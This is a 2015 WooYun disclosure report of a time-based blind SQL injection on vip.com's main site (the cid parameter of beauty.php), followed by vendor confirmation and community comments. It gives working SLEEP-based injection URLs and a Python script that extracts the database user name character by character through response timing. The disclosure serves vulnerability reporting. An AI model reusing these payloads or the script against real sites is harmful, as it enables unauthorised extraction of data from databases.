当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148436

漏洞标题:唯品会www主站存在SQL注入漏洞

相关厂商:唯品会

漏洞作者: 猪猪侠

提交时间:2015-10-21 17:54

修复时间:2015-12-06 14:34

公开时间:2015-12-06 14:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-22: 厂商已经确认,细节仅向厂商公开
2015-11-01: 细节向核心白帽子及相关领域专家公开
2015-11-11: 细节向普通白帽子公开
2015-11-21: 细节向实习白帽子公开
2015-12-06: 细节向公众公开

简要描述:

唯品会www主站存在SQL注入漏洞,说好的WAF呢?

详细说明:

#1 注入点

http://www.vip.com/beauty.php?cid=9&stock=9&order=9&page=9
注入参数:cid


#2 注入参数

http://www.vip.com/beauty.php?cid=9);(SELECT * FROM (SELECT(SLEEP(5)))ring)&stock=9&order=9&page=9


SLEEP,5秒后成功打开网页

漏洞证明:

# 10秒

http://www.vip.com/beauty.php?cid=9);(SELECT * FROM (SELECT(SLEEP(10)))ring)&stock=9&order=9&page=9
写个脚本跑。。。。
数据库 > 5.0.11


# 跑用户名

http://www.vip.com/beauty.php?cid=9);(SELECT * FROM (SELECT(SLEEP(LENGTH(USER()))))ring)&stock=9&order=9&page=9
大概停了18秒


mask 区域 
*****.200*****


# 跑数据库

http://www.vip.com/beauty.php?cid=9);(SELECT * FROM (SELECT(SLEEP(LENGTH(DATABASE()))))ring)&stock=9&order=9&page=9
大概停了14秒


mask 区域 
*****op_*****


以3秒为指数

http://www.vip.com/beauty.php?cid=9);(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(USER()),1,1))=114)*3)))ring)&stock=9&order=9&page=9


#!/usr/bin/env python
# encoding: utf-8
# vip.py 
# ringzero@0x557.org
import requests
import time
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
for i in range(1,20):
    for _str in payloads:
        start_time = time.time()
        url = "http://www.vip.com/beauty.php?cid=9);(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(USER())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))ring)&stock=9&order=9&page=9"
        result = requests.get(url).text
        if(time.time() - start_time) > 3:
            print _str
            break

修复方案:

# 你们比我懂

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-10-22 14:32

厂商回复:

非常感谢猪猪侠的报告使我们修复了一个严重的安全问题,谢谢您对唯品会信息安全的支持和关注!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-21 17:54 | 3King ( 普通白帽子 | Rank:1139 漏洞数:94 | 【study at HNUST】非常感谢大家的关注~ 大...)

    前排占座

  2. 2015-10-21 17:55 | Annabelle ( 实习白帽子 | Rank:56 漏洞数:17 | .)

    前排膜拜

  3. 2015-10-21 17:55 | 慢慢 ( 普通白帽子 | Rank:620 漏洞数:178 | 学习新姿势~)

    这是猪猪侠在测试新改版神器?

  4. 2015-10-21 17:57 | 无证白帽 ( 路人 | Rank:2 漏洞数:1 | null)

    前排膜拜www

  5. 2015-10-21 17:59 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    wocao

  6. 2015-10-21 18:00 | getshell1993 ( 普通白帽子 | Rank:678 漏洞数:77 | ~!@#¥%……&*)

    主站…

  7. 2015-10-21 18:04 | luwikes ( 普通白帽子 | Rank:522 漏洞数:78 | 潜心学习~~~)

    哎呀wocaowocao,丧(gan)心(de)病(piao)狂(liang)

  8. 2015-10-21 18:07 | 紫霞仙子 ( 普通白帽子 | Rank:2107 漏洞数:296 | 天天向上 !!!)

    吓死了,我靠

  9. 2015-10-21 18:07 | null_z ( 普通白帽子 | Rank:317 漏洞数:44 )

    Niniubi

  10. 2015-10-21 18:09 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1741 漏洞数:278 | ...........................................)

    屌啊

  11. 2015-10-21 18:10 | Mieless ( 实习白帽子 | Rank:33 漏洞数:9 | 我是来打酱油的。)

    只关心送什么

  12. 2015-10-21 18:10 | 神笔马良 ( 普通白帽子 | Rank:130 漏洞数:45 | 爱写字的马)

    cao 打脸漏洞

  13. 2015-10-21 18:17 | 沦沦 ( 普通白帽子 | Rank:586 漏洞数:138 | 爱老婆,爱生活)

    吓死我了

  14. 2015-10-21 18:25 | 随风的风 ( 普通白帽子 | Rank:170 漏洞数:56 | 微信公众号:233sec 不定期分享各种漏洞思...)

    牛逼。。。目测在测试神器

  15. 2015-10-21 18:39 | hecate ( 普通白帽子 | Rank:545 漏洞数:87 | ®高级安全工程师 | WooYun认证√)

    说好的WAF呢?

  16. 2015-10-21 18:42 | just_joker ( 实习白帽子 | Rank:77 漏洞数:18 | ..........)

    那些年说好的WAF呐

  17. 2015-10-21 18:59 | Submit ( 普通白帽子 | Rank:491 漏洞数:107 | 卖WB,1:10)

    666666666

  18. 2015-10-21 19:37 | loli 认证白帽子 ( 普通白帽子 | Rank:608 漏洞数:56 | 每个男人心中都住着一个叫小红的88号技师。)

    好吓人。。。

  19. 2015-10-21 19:38 | 大漠長河 ( 实习白帽子 | Rank:66 漏洞数:10 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区枫叶正...)

    看偶像大作.希望快点审核到Wo W

  20. 2015-10-21 20:16 | Mr .LZH ( 普通白帽子 | Rank:598 漏洞数:75 | 非妹子勿扰···)

    @孤独雪狼 强势打脸啊

  21. 2015-10-21 20:18 | LoveSnow ( 路人 | Rank:13 漏洞数:4 | 以正和,以奇胜!)

    猪哥,这是又在测神器

  22. 2015-10-21 20:57 | GrayTrack ( 实习白帽子 | Rank:84 漏洞数:19 | TXTSEC信息安全团队)

    wocao

  23. 2015-10-21 21:18 | 白无常 ( 实习白帽子 | Rank:55 漏洞数:7 )

    来签到了

  24. 2015-10-21 21:26 | 金枪银矛小霸王 ( 普通白帽子 | Rank:126 漏洞数:29 | 不会挖洞洞的猿猿不是好学生)

    好吓人。。。

  25. 2015-10-21 21:46 | Taro ( 普通白帽子 | Rank:190 漏洞数:51 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    说好的WAF呢?运维在干嘛

  26. 2015-10-21 22:07 | 撸大叔 ( 实习白帽子 | Rank:62 漏洞数:11 | 钓鱼培养耐心 养鱼需要精心!)

    膜拜www

  27. 2015-10-21 22:34 | onpu ( 普通白帽子 | Rank:104 漏洞数:29 | nopu)

    前排膜拜,说好的WAF呢?

  28. 2015-10-21 22:42 | Herolon ( 普通白帽子 | Rank:211 漏洞数:44 | ******)

    CCAV出来

  29. 2015-10-21 23:12 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    WAF也拦不住你啊

  30. 2015-10-21 23:54 | Sai、 ( 路人 | Rank:4 漏洞数:2 | for fun……)

    主站,膜膜膜

  31. 2015-10-22 07:53 | hack_lan ( 路人 | Rank:12 漏洞数:5 | 爱好linux开源架构,安全,python)

    卧槽,这也太给力了,主站的

  32. 2015-10-22 08:40 | DNS ( 普通白帽子 | Rank:514 漏洞数:61 | 没有我,你们就去背IP吧)

    唯品会说欢迎来私有src。。。

  33. 2015-10-22 08:49 | zhiher ( 路人 | Rank:16 漏洞数:4 )

    膜拜www

  34. 2015-10-22 10:55 | 胡小树 ( 实习白帽子 | Rank:64 漏洞数:12 | 我是一颗小小树)

    主站,好屌,学习

  35. 2015-10-22 14:47 | python ( 路人 | Rank:8 漏洞数:2 | 一直在门外转悠!)

    应用层面的问题,好牛!

  36. 2015-10-22 15:16 | 残冰 ( 普通白帽子 | Rank:202 漏洞数:30 | 专业爆破5000000000000000000000年)

    还有位置,来抢个座

  37. 2015-10-22 15:35 | 一只鱼 ( 路人 | Rank:4 漏洞数:1 | 寻水的雨)

    涨姿势。混脸熟

  38. 2015-10-22 16:11 | 左手 ( 实习白帽子 | Rank:48 漏洞数:13 | whoaryou)

    6

  39. 2015-10-22 16:16 | leo335 ( 路人 | Rank:1 漏洞数:1 )

    关注

  40. 2015-10-22 17:16 | Rainystar ( 路人 | Rank:1 漏洞数:1 | 低调求发展.)

    6

  41. 2015-10-27 23:02 | 指尖的温度 ( 路人 | Rank:25 漏洞数:9 )

    哎呀wocaowocao,丧(gan)心(de)病(piao)狂(liang)

  42. 2015-10-28 19:21 | ( 普通白帽子 | Rank:278 漏洞数:70 | ❤)

    @孤独雪狼